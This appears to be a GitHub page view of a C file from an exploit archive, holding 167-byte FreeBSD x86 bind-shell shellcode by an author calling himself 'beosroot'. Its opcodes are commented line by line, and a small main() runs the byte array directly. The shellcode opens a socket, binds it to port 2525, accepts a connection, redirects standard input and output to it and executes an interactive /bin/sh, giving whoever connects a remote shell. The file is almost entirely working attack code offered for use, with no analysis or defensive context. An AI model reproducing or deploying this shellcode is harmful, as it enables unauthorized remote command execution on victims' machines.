FilesExpand file tree

 master

/

14795.c

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

108 lines (99 loc) · 4.45 KB

 master

/

14795.c

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

108 lines (99 loc) · 4.45 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

/*

==================================================

bds/x86-bindshell on port 2525 shellcode 167 bytes

==================================================

*/

/*

-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------

* AUTHOR : beosroot

* OS : BSDx86 (Tested on FreeBSD)

* EMAIL : beosroot@hotmail.fr

beosroot@null.net

* GR33TZ To : joseph-h, str0ke, MHIDO55,.....

*/

const char shellcode[] =

"\x6a\x00" // push $0x0

"\x6a\x01" // push $0x1

"\x6a\x02" // push $0x2

"\x50" // push %eax

"\x6a\x61" // push $0x61

"\x58" // pop %eax

"\xcd\x80" // int $0x80

"\x50" // push %eax

"\x6a\x00" // push $0x0

"\x6a\x00" // push $0x0

"\x6a\x00" // push $0x0

"\x6a\x00" // push $0x0

"\x68\x10\x02\x09\xdd" // push $0xdd090210

"\x89\xe0" // mov %esp,%eax

"\x6a\x10" // push $0x10

"\x50" // push %eax

"\xff\x74\x24\x1c" // pushl 0x1c %esp

"\x50" // push %eax

"\x6a\x68" // push $0x68

"\x58" // pop $eax

"\xcd\x80" // int $0x80

"\x6a\x01" // push $0x1

"\xff\x74\x24\x28" // pushl 0x28 %esp

"\x50" // push %eax

"\x6a\x6a" // push $0x6a

"\x58" // pop $eax

"\xcd\x80" // int $0x80

"\x83\xec\x10" // sub $0x10,$esp

"\x6a\x10" // push $0x10

"\x8d\x44\x24\x04" // lea 0x4%esp,%eax

"\x89\xe1" // mov %esp,%ecx

"\x51" // push %ecx

"\x50" // push %eax

"\xff\x74\x24\x4c" // pushl 0x4c %esp

"\x50" // push %eax

"\x6a\x1e" // push %0x1e

"\x58" // pop %eax

"\xcd\x80" // int $0x80

"\x50" // push %eax

"\xff\x74\x24\x58" // pushl 0x58 %esp

"\x50" // push %eax

"\x6a\x06" // push $0x6

"\x58" // pop %eax

"\xcd\x80" // int $0x80

"\x6a\x00" // push $0x0

"\xff\x74\x24\x0c" // pushl 0xc %esp

"\x50" // push %eax

"\x6a\x5a" // push $0x5a

"\x58" // pop %eax

"\xcd\x80" // int $0x80

"\x6a\x01" // push $0x1

"\xff\x74\x24\x18" // pushl 0x18 %esp

"\x50" // push %eax

"\x6a\x5a" // push $0x5a

"\x58" // pop %eax

"\xcd\x80" // int $0x80

"\x6a\x02" // push $0x2

"\xff\x74\x24\x24" // pushl 0x24 %esp

"\x50" // push %eax

"\x6a\x5a" // push $0x5a

"\x58" // pop %eax

"\xcd\x80" // int $0x80

"\x68\x73\x68\x00\x00" // push $0x6873

"\x89\xe0" // mov %esp,%eax

"\x68\x2d\x69\x00\x00" // push $0x692d

"\x89\xe1" // mov %esp,%ecx

"\x6a\x00" // push $0x0

"\x51" // push %ecx

"\x50" // push %eax

"\x68\x2f\x73\x68\x00" // push $0x68732f

"\x68\x2f\x62\x69\x6e" // push $0x6e69622f

"\x89\xe0" // mov %esp,%eax

"\x8d\x4c\x24\x08" // lea 0x8 %esp,%ecx

"\x6a\x00" // push $0x0

"\x51" // push %ecx

"\x50" // push %eax

"\x50" // push %eax

"\x6a\x3b" // push $0x3b

"\x58" // pop %eax

"\xcd\x80"; // int $0x80

int main() {

void (*hell)() = (void *)shellcode;

return (*(int(*)())shellcode)();

}

// the end o.O